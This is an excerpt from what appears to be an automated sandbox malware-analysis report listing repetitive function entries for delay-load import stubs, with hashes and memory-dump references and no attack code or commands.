                                                              • Opcode ID: cb0b3604cb05e261e6b01402a465cdd7ddfad9e1f021e4f9c654dc00f34692a5
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: cb0b3604cb05e261e6b01402a465cdd7ddfad9e1f021e4f9c654dc00f34692a5
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 2a0977afea9fdc0c4edde90bcafeb07581afc4734d4b4f0b96a1f569ffc636d0
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 2a0977afea9fdc0c4edde90bcafeb07581afc4734d4b4f0b96a1f569ffc636d0
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 20039d108c31570958e7e57ab5819dfc74179d1764a1c56e4f9e8cbe9e011ecb
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 20039d108c31570958e7e57ab5819dfc74179d1764a1c56e4f9e8cbe9e011ecb
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 0ea4249b0fcd4478d4f70a37a8f9f6a24fa920fb1a14f8baac8e33bcebab6b08
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 0ea4249b0fcd4478d4f70a37a8f9f6a24fa920fb1a14f8baac8e33bcebab6b08
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: cbb0486c7fd03f9d63bae8952f5dec1d9425bbfe20c9b514c264149870839d09
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: cbb0486c7fd03f9d63bae8952f5dec1d9425bbfe20c9b514c264149870839d09
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 0e4ac223e9f9249b293b85af0591a8274a35d3cd37cb4c4dd5cbfbd512a676da
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 0e4ac223e9f9249b293b85af0591a8274a35d3cd37cb4c4dd5cbfbd512a676da
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 4a53e3681519544c475d42b6455ce5426bea97601b19bb655130be08534be512
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 4a53e3681519544c475d42b6455ce5426bea97601b19bb655130be08534be512
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: ade1b7697b72d5e43e2e770d3abcef0aef6d3a0a51eef68b1c6ee9e2155b6e69
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: ade1b7697b72d5e43e2e770d3abcef0aef6d3a0a51eef68b1c6ee9e2155b6e69
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E1E3
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: C
                                                              • API String ID: 1269201914-1915930400
                                                              • Opcode ID: 97d19b82dcf35b656be410511fad1d674c02787a1b3ce51c461910141d6e0164
                                                              • Instruction ID: 5359edb63d434a3202bd2e236c40f941e7798a0cd45cc2656431328f3cf646ce
                                                              • Opcode Fuzzy Hash: 97d19b82dcf35b656be410511fad1d674c02787a1b3ce51c461910141d6e0164
                                                              • Instruction Fuzzy Hash: 9AA012D115A101FC300821431C02C37010CC0C8B15730542FFC02C00C1684868050839
                                                              Function 0043E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDu<C
                                                              • API String ID: 1269201914-3993865770
                                                              • Opcode ID: 9158e3f5162376bdd9ff70717c75b6180947ada705020e7e5ab0d5f078b7fa46
                                                              • Instruction ID: 0d9c436c1c24097cf15a49e544fec7db3d9d01dab3566da000a8d3442a5541bb
                                                              • Opcode Fuzzy Hash: 9158e3f5162376bdd9ff70717c75b6180947ada705020e7e5ab0d5f078b7fa46
                                                              • Instruction Fuzzy Hash: 4EA012C155A101BC300821431C02C3B010CC0C9F1D730641FF811800C168480C450839
                                                              Function 0043E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDu<C
                                                              • API String ID: 1269201914-3993865770
                                                              • Opcode ID: 4a0001aac8aec21e5cf2e9beb39e96b5fd7a93c7af4900ef9b23326f5e29c3b4
                                                              • Instruction ID: 0d9c436c1c24097cf15a49e544fec7db3d9d01dab3566da000a8d3442a5541bb
                                                              • Opcode Fuzzy Hash: 4a0001aac8aec21e5cf2e9beb39e96b5fd7a93c7af4900ef9b23326f5e29c3b4
                                                              • Instruction Fuzzy Hash: 4EA012C155A101BC300821431C02C3B010CC0C9F1D730641FF811800C168480C450839
                                                              Function 0043E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDu<C
                                                              • API String ID: 1269201914-3993865770
                                                              • Opcode ID: a427eb20c0febd9152250908f22d699174b1b8f91ee32a86da7dfa09fc89fa3b
                                                              • Instruction ID: 0d9c436c1c24097cf15a49e544fec7db3d9d01dab3566da000a8d3442a5541bb
                                                              • Opcode Fuzzy Hash: a427eb20c0febd9152250908f22d699174b1b8f91ee32a86da7dfa09fc89fa3b
                                                              • Instruction Fuzzy Hash: 4EA012C155A101BC300821431C02C3B010CC0C9F1D730641FF811800C168480C450839
                                                              Function 0043E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E51F
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: PDu<C
                                                              • API String ID: 1269201914-3993865770
                                                              • Opcode ID: 397e79076212cfee48d6eb3c25e8cb4c3818b4feb63581f99cd41db9a260cc68
                                                              • Instruction ID: 0d9c436c1c24097cf15a49e544fec7db3d9d01dab3566da000a8d3442a5541bb
                                                              • Opcode Fuzzy Hash: 397e79076212cfee48d6eb3c25e8cb4c3818b4feb63581f99cd41db9a260cc68
                                                              • Instruction Fuzzy Hash: 4EA012C155A101BC300821431C02C3B010CC0C9F1D730641FF811800C168480C450839
                                                              Function 0043E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: 5e0e0f12efd55ba43e8be84d705a3a00e758bca456b2e8b79017bd26ba8bb287
                                                              • Instruction ID: 428c108683e66c54ce19138fb9e854a3f0a910d07748d0049631d20670d720b5
                                                              • Opcode Fuzzy Hash: 5e0e0f12efd55ba43e8be84d705a3a00e758bca456b2e8b79017bd26ba8bb287
                                                              • Instruction Fuzzy Hash: 8EA012C15961007C300821A31C02C37010CC0C4B1A730611FF800810C168480905083D
                                                              Function 0043E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: FjunC
                                                              • API String ID: 1269201914-662778638
                                                              • Opcode ID: 0f2fcf9c0e6786c1d51ca35882452dbcfc6707c27522bb2c2b7441727946dfd3
                                                              • Instruction ID: 286df3d719093ab3b87094417bb43b1054ee3d04efe9105f90827b3394b83210
                                                              • Opcode Fuzzy Hash: 0f2fcf9c0e6786c1d51ca35882452dbcfc6707c27522bb2c2b7441727946dfd3
                                                              • Instruction Fuzzy Hash: 73A012C155A101BC300821931C02C37010CC0C8B19730641FF801810C168480805083D
                                                              Function 0043E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0043E580
                                                                • Part of subcall function 0043E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0043E8D0
                                                                • Part of subcall function 0043E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0043E8E1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
